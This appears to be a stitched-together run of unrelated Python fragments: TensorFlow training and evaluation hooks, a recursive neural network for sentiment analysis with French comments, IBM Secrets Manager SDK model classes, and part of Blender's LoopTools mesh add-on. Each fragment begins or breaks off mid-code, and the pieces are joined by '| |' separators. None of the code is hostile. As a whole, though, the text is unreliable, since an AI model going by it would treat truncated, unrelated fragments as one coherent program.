myfile.write(report)
#calculate metrics:
metrics = {}
metrics['Acc'] = correct/float(total) if correct > 0 else 0.0
if len(rrs) > 0:
metrics['MRR'] = np.mean(rrs)
if consistent:
mp, mr, mf = self._calc_micro_PRF(predictions_bin, targets_bin)
Mp, Mr, Mf = self._calc_macro_PRF(predictions_bin, targets_bin)
if n > 1:
metrics['microP'] = mp
metrics['microR'] = mr
metrics['microF1'] = mf
metrics['macroP'] = Mp
metrics['macroR'] = Mr
metrics['macroF1'] = Mf
elif n == 1:
metrics['Prec'] = mp
metrics['Rec'] = mr
metrics['F1'] = mf
#output
if len(self.metrics) == 0:
printmetrics = sorted(metrics.keys())
else:
printmetrics = [m for m in self.metrics if m in metrics.keys()]
res = "Epoch %d\tcorrect: %d/%d"%(epoch, correct, total)
for m in printmetrics:
#if len(printmetrics) > 2:
# res += '\n'
res += '\t%s: %.3f'%(m, metrics[m])
self.update_summary(sess, epoch, self.info+'_'+m, metrics[m])
if self.write_metrics_to != '':
with open(self.write_metrics_to, 'a') as f:
f.write("{0} {1} {2:.5}\n".format(datetime.now(), self.info+'_'+m,
np.round(metrics[m],5)))
res += '\t(%s)'%self.info
logger.info(res)
#self.done_for_epoch = True
return targets, predictions, metrics # return those so more they can be printed to file, etc
def at_epoch_end(self, sess, epoch, model, loss):
if epoch % self.at_every_epoch == 0:
self.__call__(sess, epoch, model, loss)
else:
return
def at_iteration_end(self, *args, **kwargs):
return
class PRF1Hook(Hook):
"""
Evaluate and print per-class and average precision, recall, F1.
"""
def __init__(self, batcher, placeholders, at_every_epoch):
self.batcher = batcher
self.placeholders = placeholders
self.at_every_epoch = at_every_epoch
def __call__(self, sess, epoch, iter, model, loss, current_feed_dict=None):
if iter == 0 and epoch % self.at_every_epoch == 0:
total = 0
correct = 0
truth_all = []
pred_all = []
for values in self.batcher:
total += len(values[-1])
feed_dict = {}
for i in range(0, len(self.placeholders)):
feed_dict[self.placeholders[i]] = values[i]
truth = np.argmax(values[-1], 1)
predicted = sess.run(tf.arg_max(tf.nn.softmax(model), 1), feed_dict=feed_dict)
correct += sum(truth == predicted)
truth_all.extend(truth)
pred_all.extend(predicted)
print(classification_report(truth_all, pred_all, digits=4))
class SaveModelHook(Hook):
def __init__(self, path, at_epoch, at_every_epoch=0):
self.path = path + "/"
self.at_epoch = at_epoch
self.at_every_epoch = at_every_epoch
# fixme: don't save optimizer parameters
# self.saver = tf.train.Saver(tf.global_variables())
self.saver = tf.train.Saver(tf.trainable_variables())
def __call__(self, sess, epoch, iter, model, loss, current_feed_dict=None):
if epoch == self.at_epoch:
logger.info("Saving model...")
# todo
pass
#save_model(self.saver, sess, self.path, model, None)
class LoadModelHook(Hook):
def __init__(self, path, at_epoch, at_every_epoch=0):
self.path = path + "/"
self.at_epoch = at_epoch
self.at_every_epoch = at_every_epoch
self.saver = tf.train.Saver(tf.global_variables())
def __call__(self, sess, epoch, iter, model, loss, current_feed_dict=None):
if epoch == self.at_epoch:
logger.info("Loading model...")
# todo
pass
#model = load_model(sess, self.path + | |
<reponame>jalayrupera/Sentiment-analysis-on-amazon-product
# -*- coding: utf8 -*-
import numpy as np
import pickle
import Tree
class RNN(object):
"""Class to use Recursive Neural Network on Tree
Usage
-----
Methods
-------
"""
def __init__(self, vocab={}, dim=30, r=0.0001, reg=1):
self.dim = dim
#Initiate V, the tensor operator
self.V = np.random.uniform(-r, r, size=(dim, 2*dim, 2*dim))
self.V = (self.V+np.transpose(self.V, axes=[0, 2, 1]))/2
#Initiate W, the linear operator
self.W = np.random.uniform(-r, r, size=(dim, 2*dim))
#Initiate Ws, the linear operator
self.Ws = np.random.uniform(-r, r, size=(2, dim))
#Regularisation
self.regV = reg*0.001
self.regW = reg*0.001
self.regWs = reg*0.0001
self.regL = reg*0.0001
#Initiate L, the Lexicon representation
self.L = np.random.uniform(-r, r, size=(len(vocab), dim))
self.vocab = {}
for i, w in enumerate(vocab):
self.vocab[w] = i
self.f = lambda X: np.tanh(X.T.dot(self.V).dot(X) + self.W.dot(X))
self.grad = lambda f: 1-f**2
self.y = lambda x: np.exp(self.Ws.dot(x).clip(-500, 700)) \
/ sum(np.exp(self.Ws.dot(x).clip(-500, 700)))
def save(self, saveFile):
with open(saveFile, 'wb') as output:
pickle.dump(self.dim, output, -1)
pickle.dump(self.V, output, -1)
pickle.dump(self.W, output, -1)
pickle.dump(self.Ws, output, -1)
pickle.dump(self.regV, output, -1)
pickle.dump(self.regW, output, -1)
pickle.dump(self.regWs, output, -1)
pickle.dump(self.regL, output, -1)
pickle.dump(self.L, output, -1)
pickle.dump(self.vocab, output, -1)
def load(self, loadFile):
with open(loadFile, 'rb') as input:
self.dim = pickle.load(input)
self.V = pickle.load(input)
self.W = pickle.load(input)
self.Ws = pickle.load(input)
self.regV = pickle.load(input)
self.regW = pickle.load(input)
self.regWs = pickle.load(input)
self.regL = pickle.load(input)
self.L = pickle.load(input)
self.vocab = pickle.load(input)
def error(self, val_set):
'''
Calcule l'erreur moyenne sur le set val_set avec les parametres actuel
'''
errorVal = 0.0
for X_tree in val_set:
errorVal += self.forward_pass(X_tree)
return errorVal/len(val_set)
def forward_pass(self, X_tree):
'''
Effectue la passe forward et calcule l'erreur actuelle pour l'arbre X_tree
'''
errorVal = 0.0
for n in X_tree.leaf:
n.X = self.L[self.vocab[n.word]] # Met a jour le mot avec le Lexicon courant
n.ypred = self.y(n.X) # Mise a jour du label predit
n.ypred += 1e-300*(n.ypred == 0)
assert (n.ypred != 0).all()
errorVal += -np.sum(n.y*np.log(n.ypred))
for p, [a, b] in X_tree.parcours:
aT = X_tree.nodes[a] #
bT = X_tree.nodes[b] # Recupere pour chaque triplet parent,enfant1/2 les noeuds
pT = X_tree.nodes[p]
if aT.order < bT.order:
X = np.append(aT.X, bT.X)
else:
X = np.append(bT.X, aT.X)
pT.X = self.f(X) # Mise a jour du decripteur du parent
pT.ypred = self.y(pT.X) # Mise a jour du label predit
pT.ypred += 1e-300*(pT.ypred == 0)
errorVal += -np.sum(pT.y*np.log(pT.ypred))
#E = sum([(self.y(n.X) - n.y) for n in X_tree.nodes])
#print E
#return self.Ws.dot(pT.X) -> Pas besoin de retourner le lbel, il faut le maj aussi?
return errorVal
def backward_pass(self, X_tree, root=False):
'''
Retourne le gradient du a l'erreur commise sur l'arbre X_tree
Attention: suppose la forward_pass faite
'''
#Initialise les gradients
dWs = np.zeros(self.Ws.shape)
dV = np.zeros(self.V.shape)
dW = np.zeros(self.W.shape)
dL = np.zeros(self.L.shape)
#Initialise les deltas
for n in X_tree.nodes:
n.d = self.Ws.T.dot(n.ypred-n.y)
#Descend dans l arbre
for p, [a, b] in X_tree.parcours[::-1]:
aT = X_tree.nodes[a] #
bT = X_tree.nodes[b] # Recupere pour chaque triplet parent,enfant1/2 les noeuds
pT = X_tree.nodes[p]
gX = self.grad(pT.X)
#Propagation des erreurs vers le bas
if aT.order < bT.order: # Si aT est le noeud de gauche
X = np.append(aT.X, bT.X)
ddown = (self.W.T.dot(pT.d*gX)+2*(pT.d*gX).dot(self.V.dot(X)))
aT.d += ddown[:self.dim]
bT.d += ddown[self.dim:]
else: # aT est a droite
X = np.append(bT.X, aT.X)
ddown = (self.W.T.dot(pT.d*gX)+2*(pT.d*gX).dot(self.V.dot(X)))
aT.d += ddown[self.dim:]
bT.d += ddown[:self.dim]
#Contribution aux gradients du pT
dWs += np.outer(pT.ypred-pT.y, pT.X)
dV += np.tensordot(pT.d*gX, np.outer(X, X), axes=0)
dW += np.outer(pT.d*gX, X)
#Contribution des feuilles
for n in X_tree.leaf:
dL[self.vocab[n.word]] += n.d
dWs += np.outer(n.ypred-n.y, n.X)
return dWs, dV, dW, dL
def train(self, X_trees, learning_rate=0.01, mini_batch_size=27,
warm_start=True, r=0.0001, max_iter=1000, val_set=[],
n_check=100, strat='AdaGrad',
bin=False, reset_freq=-1, save_tmp='tmp.pkl', n_stop=4):
'''
Training avec AdaGrad (Dutchi et al.), prends en entrée une liste d'arbres X_trees
'''
#Remise à zero du modele
if not warm_start:
dim = self.dim
#Initiate V, the tensor operator
self.V = np.random.uniform(-r, r, size=(dim, 2*dim, 2*dim))
self.V = (self.V+np.transpose(self.V, axes=[0, 2, 1]))/2
#Initiate W, the linear operator
self.W = np.random.uniform(-r, r, size=(dim, 2*dim))
#Initiate Ws, the linear operator
self.Ws = np.random.uniform(-r, r, size=(2, dim))
#Initiate L, the Lexicon representation
self.L = np.random.uniform(-r, r, size=(len(self.vocab), dim))
#Liste pour erreurs
errMB = []
errVal = []
#Condition d'arret
n_iter = 1
gradNorm = 1.0
if val_set != []:
prevError = self.error(val_set)
prevError += self.regWs*np.sum(self.Ws*self.Ws)/2.0
prevError += self.regW*np.sum(self.W*self.W)/2.0
prevError += self.regV*np.sum(self.V*self.V)/2.0
prevError += self.regL*np.sum(self.L*self.L)/2.0
iniError = prevError
minError = prevError # optimal error so far
glError = 0
upStop = 0
errVal.append(prevError)
# Normalisation pour AdaGrad/Rms-prop
eta = learning_rate
dWsHist = np.zeros(self.Ws.shape)
dVHist = np.zeros(self.V.shape)
dWHist = np.zeros(self.W.shape)
dLHist = np.zeros(self.L.shape)
#Adaptative LR for RMSprop
dWsMask = np.ones(self.Ws.shape)
dVMask = np.ones(self.V.shape)
dWMask = np.ones(self.W.shape)
dLMask = np.ones(self.L.shape)
dWsPrev = np.zeros(self.Ws.shape)
dVPrev = np.zeros(self.V.shape)
dWPrev = np.zeros(self.W.shape)
dLPrev = np.zeros(self.L.shape)
early_stop = False
while (not early_stop) and n_iter < max_iter: # Critere moins random
if n_iter % reset_freq == 0 and reset_freq > 0: # Remise a zero des rates cf Socher
dWsHist = np.zeros(self.Ws.shape)
dVHist = np.zeros(self.V.shape)
dWHist = np.zeros(self.W.shape)
dLHist = np.zeros(self.L.shape)
#Choose mini batch randomly
mini_batch_samples = np.random.choice(X_trees, size=mini_batch_size)
#Initialize gradients to 0
dWsCurrent = np.zeros(self.Ws.shape)
dVCurrent = np.zeros(self.V.shape)
dWCurrent = np.zeros(self.W.shape)
dLCurrent = np.zeros(self.L.shape)
#Mini batch pour gradient
currentMbe = 0.0
for X_tree in mini_batch_samples:
currentMbe += self.forward_pass(X_tree)
dWs, dV, dW, dL = self.backward_pass(X_tree)
dWsCurrent += dWs
dVCurrent += dV
dWCurrent += dW
dLCurrent += dL
currentMbe /= mini_batch_size
currentMbe += self.regWs*np.sum(self.Ws*self.Ws)/2.0
currentMbe += self.regW*np.sum(self.W*self.W)/2.0
currentMbe += self.regV*np.sum(self.V*self.V)/2.0
currentMbe += self.regL*np.sum(self.L*self.L)/2.0
#Division par le nombre de sample + regularisation
dWsCurrent = dWsCurrent/mini_batch_size+self.regWs*self.Ws
dVCurrent = dVCurrent/mini_batch_size+self.regV*self.V
dWCurrent = dWCurrent/mini_batch_size+self.regW*self.W
dLCurrent = dLCurrent/mini_batch_size+self.regL*self.L
#Mise a jour des poids et calcul des pas
if strat == 'AdaGrad':
eps = 0.001 # Adagrad >0 ? cf Socher
dWsHist += dWsCurrent*dWsCurrent
dVHist += dVCurrent*dVCurrent
dWHist += dWCurrent*dWCurrent
dLHist += dLCurrent*dLCurrent
dWsCurrent = eta*dWsCurrent/np.sqrt(dWsHist+eps)
dWCurrent = eta*dWCurrent/np.sqrt(dWHist+eps)
dVCurrent = eta*dVCurrent/np.sqrt(dVHist+eps)
dLCurrent = eta*dLCurrent/np.sqrt(dLHist+eps)
else:
eps = 0.001
dWsHist = 0.9*dWsHist + 0.1*dWsCurrent*dWsCurrent
dVHist = 0.9*dVHist + 0.1*dVCurrent*dVCurrent
dWHist = 0.9*dWHist + 0.1*dWCurrent*dWCurrent
dLHist = 0.9*dLHist + 0.1*dLCurrent*dLCurrent
dWsMask *= .7*(dWsPrev*dWsCurrent >= 0) + .5
dWMask *= .7*(dWPrev*dWCurrent >= 0) + .5
dVMask *= .7*(dVPrev*dVCurrent >= 0) + .5
dLMask *= .7*(dLPrev*dLCurrent >= 0) + .5
dWsCurrent = eta*dWsMask.clip(1e-6, 50, out=dWsMask)*dWsCurrent/np.sqrt(dWsHist+eps)
dWCurrent = eta*dWMask.clip(1e-6, 50, out=dWMask)*dWCurrent/np.sqrt(dWHist+eps)
dVCurrent = eta*dVMask.clip(1e-6, 20, out=dVMask)*dVCurrent/np.sqrt(dVHist+eps)
dLCurrent = eta*dLMask.clip(1e-6, 20, out=dLMask)*dLCurrent/np.sqrt(dLHist+eps)
#Calcul de la norme du gradient (critere d'arret)
gradNorm = np.sum(np.abs(dWsCurrent))
gradNorm += np.sum(np.abs(dWCurrent))
gradNorm += np.sum(np.abs(dVCurrent))
gradNorm += np.sum(np.abs(dLCurrent))
#Keep previous gradient
dWsPrev = dWsCurrent
dWPrev = dWCurrent
dVPrev = dVCurrent
dLPrev = dLCurrent
#Descente
self.Ws -= dWsCurrent
self.W -= dWCurrent
self.V -= dVCurrent
self.L -= dLCurrent
#Maj de la condition d'arret
if val_set != [] and (n_iter % n_check) == 0:
currentError = self.error(val_set)
currentError += self.regWs*np.sum(self.Ws*self.Ws)/2.0
currentError += self.regW*np.sum(self.W*self.W)/2.0
currentError += self.regV*np.sum(self.V*self.V)/2.0
currentError += self.regL*np.sum(self.L*self.L)/2.0
errVal.append(currentError)
errMB.append(currentMbe)
print('Error on validation set at iter {0} : {1} '
'(previous : {2})'.format(n_iter, currentError, prevError))
print('Error on mini batch at iter {0} : {1} '
'(Gradient norm : {2})'.format(n_iter, currentMbe, gradNorm))
with open(save_tmp, 'wb') as output:
pickle.dump(errVal, output, -1)
pickle.dump(errMB, output, -1)
#Early stopping
minError = min(minError, currentError)
glError = 100*((currentError/minError)-1.0)
if currentError > prevError:
upStop += 1
else:
upStop = 0
early_stop = (upStop >= n_stop) and (n_stop > 0) # UP criterion
prevError = currentError
else:
print('Error on mini batch at iter {0} : {1} '
'(Gradient norm : {2})'.format(n_iter, currentMbe, gradNorm))
errMB.append(currentMbe)
#Maj iter
n_iter += 1
if val_set != []:
print('Error on training set before and after training'
'({2} iter) : {0}->{1}\n'.format(iniError, currentError, n_iter))
print('Generalization error : {0}'.format(glError))
return errMB, errVal
def score_fine(self, X_trees):
'''
Score sur les predictions MAP avec 5 label
'''
countAll = 0
countRoot = 0
scAll = 0.0
scRoot = 0.0
for X_tree in X_trees:
self.forward_pass(X_tree)
for n in X_tree.nodes:
countAll += 1
scAll += (Tree.Tree.getSoftLabel(n.ypred[1]) == Tree.Tree.getSoftLabel(n.y[1]))
countRoot += 1
n = X_tree.nodes[-1]
scRoot += (Tree.Tree.getSoftLabel(n.ypred[1]) == Tree.Tree.getSoftLabel(n.y[1]))
return scAll/countAll, scRoot/countRoot
def score_binary(self, X_trees, inc_neut=False):
'''
Score sur les prediction MAP pos/neg
'''
countAll = 0
countRoot = 0
scAll = 0.0
scRoot = | |
Dict) -> 'GetSecret':
"""Initialize a GetSecret object from a json dictionary."""
args = {}
if 'metadata' in _dict:
args['metadata'] = CollectionMetadata.from_dict(_dict.get('metadata'))
else:
raise ValueError('Required property \'metadata\' not present in GetSecret JSON')
if 'resources' in _dict:
args['resources'] = _dict.get('resources')
else:
raise ValueError('Required property \'resources\' not present in GetSecret JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a GetSecret object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'metadata') and self.metadata is not None:
_dict['metadata'] = self.metadata.to_dict()
if hasattr(self, 'resources') and self.resources is not None:
resources_list = []
for x in self.resources:
if isinstance(x, dict):
resources_list.append(x)
else:
resources_list.append(x.to_dict())
_dict['resources'] = resources_list
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this GetSecret object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'GetSecret') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'GetSecret') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class GetSecretPolicies():
"""
GetSecretPolicies.
"""
def __init__(self) -> None:
"""
Initialize a GetSecretPolicies object.
"""
msg = "Cannot instantiate base class. Instead, instantiate one of the defined subclasses: {0}".format(
", ".join(['GetSecretPolicyRotation']))
raise Exception(msg)
class GetSecretPolicyRotationResourcesItem():
"""
Properties that describe a rotation policy.
:attr str id: The v4 UUID that uniquely identifies the policy.
:attr str crn: (optional) The Cloud Resource Name (CRN) that uniquely identifies
your cloud resources.
:attr datetime creation_date: (optional) The date the policy was created. The
date format follows RFC 3339.
:attr str created_by: (optional) The unique identifier for the entity that
created the policy.
:attr datetime last_update_date: (optional) Updates when the policy is replaced
or modified. The date format follows RFC 3339.
:attr str updated_by: (optional) The unique identifier for the entity that
updated the policy.
:attr str type: The MIME type that represents the policy. Currently, only the
default is supported.
:attr SecretPolicyRotationRotation rotation:
"""
def __init__(self,
id: str,
type: str,
rotation: 'SecretPolicyRotationRotation',
*,
crn: str = None,
creation_date: datetime = None,
created_by: str = None,
last_update_date: datetime = None,
updated_by: str = None) -> None:
"""
Initialize a GetSecretPolicyRotationResourcesItem object.
:param str id: The v4 UUID that uniquely identifies the policy.
:param str type: The MIME type that represents the policy. Currently, only
the default is supported.
:param SecretPolicyRotationRotation rotation:
"""
self.id = id
self.crn = crn
self.creation_date = creation_date
self.created_by = created_by
self.last_update_date = last_update_date
self.updated_by = updated_by
self.type = type
self.rotation = rotation
@classmethod
def from_dict(cls, _dict: Dict) -> 'GetSecretPolicyRotationResourcesItem':
"""Initialize a GetSecretPolicyRotationResourcesItem object from a json dictionary."""
args = {}
if 'id' in _dict:
args['id'] = _dict.get('id')
else:
raise ValueError('Required property \'id\' not present in GetSecretPolicyRotationResourcesItem JSON')
if 'crn' in _dict:
args['crn'] = _dict.get('crn')
if 'creation_date' in _dict:
args['creation_date'] = string_to_datetime(_dict.get('creation_date'))
if 'created_by' in _dict:
args['created_by'] = _dict.get('created_by')
if 'last_update_date' in _dict:
args['last_update_date'] = string_to_datetime(_dict.get('last_update_date'))
if 'updated_by' in _dict:
args['updated_by'] = _dict.get('updated_by')
if 'type' in _dict:
args['type'] = _dict.get('type')
else:
raise ValueError('Required property \'type\' not present in GetSecretPolicyRotationResourcesItem JSON')
if 'rotation' in _dict:
args['rotation'] = _dict.get('rotation')
else:
raise ValueError('Required property \'rotation\' not present in GetSecretPolicyRotationResourcesItem JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a GetSecretPolicyRotationResourcesItem object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'id') and getattr(self, 'id') is not None:
_dict['id'] = getattr(self, 'id')
if hasattr(self, 'crn') and getattr(self, 'crn') is not None:
_dict['crn'] = getattr(self, 'crn')
if hasattr(self, 'creation_date') and getattr(self, 'creation_date') is not None:
_dict['creation_date'] = datetime_to_string(getattr(self, 'creation_date'))
if hasattr(self, 'created_by') and getattr(self, 'created_by') is not None:
_dict['created_by'] = getattr(self, 'created_by')
if hasattr(self, 'last_update_date') and getattr(self, 'last_update_date') is not None:
_dict['last_update_date'] = datetime_to_string(getattr(self, 'last_update_date'))
if hasattr(self, 'updated_by') and getattr(self, 'updated_by') is not None:
_dict['updated_by'] = getattr(self, 'updated_by')
if hasattr(self, 'type') and self.type is not None:
_dict['type'] = self.type
if hasattr(self, 'rotation') and self.rotation is not None:
if isinstance(self.rotation, dict):
_dict['rotation'] = self.rotation
else:
_dict['rotation'] = self.rotation.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this GetSecretPolicyRotationResourcesItem object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'GetSecretPolicyRotationResourcesItem') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'GetSecretPolicyRotationResourcesItem') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class TypeEnum(str, Enum):
"""
The MIME type that represents the policy. Currently, only the default is
supported.
"""
APPLICATION_VND_IBM_SECRETS_MANAGER_SECRET_POLICY_JSON = 'application/vnd.ibm.secrets-manager.secret.policy+json'
class GetSecretVersion():
"""
Properties that describe the version of a secret.
:attr CollectionMetadata metadata: The metadata that describes the resource
array.
:attr List[SecretVersion] resources: A collection of resources.
"""
def __init__(self,
metadata: 'CollectionMetadata',
resources: List['SecretVersion']) -> None:
"""
Initialize a GetSecretVersion object.
:param CollectionMetadata metadata: The metadata that describes the
resource array.
:param List[SecretVersion] resources: A collection of resources.
"""
self.metadata = metadata
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'GetSecretVersion':
"""Initialize a GetSecretVersion object from a json dictionary."""
args = {}
if 'metadata' in _dict:
args['metadata'] = CollectionMetadata.from_dict(_dict.get('metadata'))
else:
raise ValueError('Required property \'metadata\' not present in GetSecretVersion JSON')
if 'resources' in _dict:
args['resources'] = _dict.get('resources')
else:
raise ValueError('Required property \'resources\' not present in GetSecretVersion JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a GetSecretVersion object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'metadata') and self.metadata is not None:
_dict['metadata'] = self.metadata.to_dict()
if hasattr(self, 'resources') and self.resources is not None:
resources_list = []
for x in self.resources:
if isinstance(x, dict):
resources_list.append(x)
else:
resources_list.append(x.to_dict())
_dict['resources'] = resources_list
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this GetSecretVersion object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'GetSecretVersion') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'GetSecretVersion') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class GetSecretVersionMetadata():
"""
Properties that describe the version of a secret.
:attr CollectionMetadata metadata: The metadata that describes the resource
array.
:attr List[SecretVersionMetadata] resources: A collection of resources.
"""
def __init__(self,
metadata: 'CollectionMetadata',
resources: List['SecretVersionMetadata']) -> None:
"""
Initialize a GetSecretVersionMetadata object.
:param CollectionMetadata metadata: The metadata that describes the
resource array.
:param List[SecretVersionMetadata] resources: A collection of resources.
"""
self.metadata = metadata
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'GetSecretVersionMetadata':
"""Initialize a GetSecretVersionMetadata object from a json dictionary."""
args = {}
if 'metadata' in _dict:
args['metadata'] = CollectionMetadata.from_dict(_dict.get('metadata'))
else:
raise ValueError('Required property \'metadata\' not present in GetSecretVersionMetadata JSON')
if 'resources' in _dict:
args['resources'] = _dict.get('resources')
else:
raise ValueError('Required property \'resources\' not present in GetSecretVersionMetadata JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a GetSecretVersionMetadata object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'metadata') and self.metadata is not None:
_dict['metadata'] = self.metadata.to_dict()
if hasattr(self, 'resources') and self.resources is not None:
resources_list = []
for x in self.resources:
if isinstance(x, dict):
resources_list.append(x)
else:
resources_list.append(x.to_dict())
_dict['resources'] = resources_list
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this GetSecretVersionMetadata object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'GetSecretVersionMetadata') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'GetSecretVersionMetadata') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self | |
@classmethod
def poll(cls, context):
ob = context.active_object
return(ob and ob.type == 'MESH' and context.mode == 'EDIT_MESH')
def draw(self, context):
layout = self.layout
col = layout.column()
col.prop(self, "interpolation")
col.prop(self, "input")
col.prop(self, "iterations")
col.prop(self, "regular")
def invoke(self, context, event):
# load custom settings
settings_load(self)
return self.execute(context)
def execute(self, context):
# initialise
global_undo, object, mesh = initialise()
settings_write(self)
# check cache to see if we can save time
cached, single_loops, loops, derived, mapping = cache_read("Relax",
object, mesh, self.input, False)
if cached:
derived, mesh_mod = get_derived_mesh(object, mesh, context.scene)
else:
# find loops
derived, mesh_mod, loops = get_connected_input(object, mesh,
context.scene, self.input)
mapping = get_mapping(derived, mesh, mesh_mod, False, False, loops)
loops = check_loops(loops, mapping, mesh_mod)
knots, points = relax_calculate_knots(loops)
# saving cache for faster execution next time
if not cached:
cache_write("Relax", object, mesh, self.input, False, False, loops,
derived, mapping)
for iteration in range(int(self.iterations)):
# calculate splines and new positions
tknots, tpoints = relax_calculate_t(mesh_mod, knots, points,
self.regular)
splines = []
for i in range(len(knots)):
splines.append(calculate_splines(self.interpolation, mesh_mod,
tknots[i], knots[i]))
move = [relax_calculate_verts(mesh_mod, self.interpolation,
tknots, knots, tpoints, points, splines)]
move_verts(mesh, mapping, move, -1)
# cleaning up
if derived:
bpy.context.blend_data.meshes.remove(mesh_mod)
terminate(global_undo)
return{'FINISHED'}
# space operator
class Space(bpy.types.Operator):
bl_idname = "mesh.looptools_space"
bl_label = "Space"
bl_description = "Space the vertices in a regular distrubtion on the loop"
bl_options = {'REGISTER', 'UNDO'}
influence = bpy.props.FloatProperty(name = "Influence",
description = "Force of the tool",
default = 100.0,
min = 0.0,
max = 100.0,
precision = 1,
subtype = 'PERCENTAGE')
input = bpy.props.EnumProperty(name = "Input",
items = (("all", "Parallel (all)", "Also use non-selected "\
"parallel loops as input"),
("selected", "Selection","Only use selected vertices as input")),
description = "Loops that are spaced",
default = 'selected')
interpolation = bpy.props.EnumProperty(name = "Interpolation",
items = (("cubic", "Cubic", "Natural cubic spline, smooth results"),
("linear", "Linear", "Vertices are projected on existing edges")),
description = "Algorithm used for interpolation",
default = 'cubic')
@classmethod
def poll(cls, context):
ob = context.active_object
return(ob and ob.type == 'MESH' and context.mode == 'EDIT_MESH')
def draw(self, context):
layout = self.layout
col = layout.column()
col.prop(self, "interpolation")
col.prop(self, "input")
col.separator()
col.prop(self, "influence")
def invoke(self, context, event):
# load custom settings
settings_load(self)
return self.execute(context)
def execute(self, context):
# initialise
global_undo, object, mesh = initialise()
settings_write(self)
# check cache to see if we can save time
cached, single_loops, loops, derived, mapping = cache_read("Space",
object, mesh, self.input, False)
if cached:
derived, mesh_mod = get_derived_mesh(object, mesh, context.scene)
else:
# find loops
derived, mesh_mod, loops = get_connected_input(object, mesh,
context.scene, self.input)
mapping = get_mapping(derived, mesh, mesh_mod, False, False, loops)
loops = check_loops(loops, mapping, mesh_mod)
# saving cache for faster execution next time
if not cached:
cache_write("Space", object, mesh, self.input, False, False, loops,
derived, mapping)
move = []
for loop in loops:
# calculate splines and new positions
if loop[1]: # circular
loop[0].append(loop[0][0])
tknots, tpoints = space_calculate_t(mesh_mod, loop[0][:])
splines = calculate_splines(self.interpolation, mesh_mod,
tknots, loop[0][:])
move.append(space_calculate_verts(mesh_mod, self.interpolation,
tknots, tpoints, loop[0][:-1], splines))
# move vertices to new locations
move_verts(mesh, mapping, move, self.influence)
# cleaning up
if derived:
bpy.context.blend_data.meshes.remove(mesh_mod)
terminate(global_undo)
return{'FINISHED'}
##########################################
####### GUI and registration #############
##########################################
# menu containing all tools
class VIEW3D_MT_edit_mesh_looptools(bpy.types.Menu):
bl_label = "LoopTools"
def draw(self, context):
layout = self.layout
layout.operator("mesh.looptools_bridge", text="Bridge").loft = False
layout.operator("mesh.looptools_circle")
layout.operator("mesh.looptools_curve")
layout.operator("mesh.looptools_flatten")
layout.operator("mesh.looptools_bridge", text="Loft").loft = True
layout.operator("mesh.looptools_relax")
layout.operator("mesh.looptools_space")
# panel containing all tools
class VIEW3D_PT_tools_looptools(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_context = "mesh_edit"
bl_label = "LoopTools"
def draw(self, context):
layout = self.layout
col = layout.column(align=True)
lt = context.window_manager.looptools
# bridge - first line
split = col.split(percentage=0.15)
if lt.display_bridge:
split.prop(lt, "display_bridge", text="", icon='DOWNARROW_HLT')
else:
split.prop(lt, "display_bridge", text="", icon='RIGHTARROW')
split.operator("mesh.looptools_bridge", text="Bridge").loft = False
# bridge - settings
if lt.display_bridge:
box = col.column(align=True).box().column()
#box.prop(self, "mode")
# top row
col_top = box.column(align=True)
row = col_top.row(align=True)
col_left = row.column(align=True)
col_right = row.column(align=True)
col_right.active = lt.bridge_segments != 1
col_left.prop(lt, "bridge_segments")
col_right.prop(lt, "bridge_min_width", text="")
# bottom row
bottom_left = col_left.row()
bottom_left.active = lt.bridge_segments != 1
bottom_left.prop(lt, "bridge_interpolation", text="")
bottom_right = col_right.row()
bottom_right.active = lt.bridge_interpolation == 'cubic'
bottom_right.prop(lt, "bridge_cubic_strength")
# boolean properties
col_top.prop(lt, "bridge_remove_faces")
# override properties
col_top.separator()
row = box.row(align = True)
row.prop(lt, "bridge_twist")
row.prop(lt, "bridge_reverse")
# circle - first line
split = col.split(percentage=0.15)
if lt.display_circle:
split.prop(lt, "display_circle", text="", icon='DOWNARROW_HLT')
else:
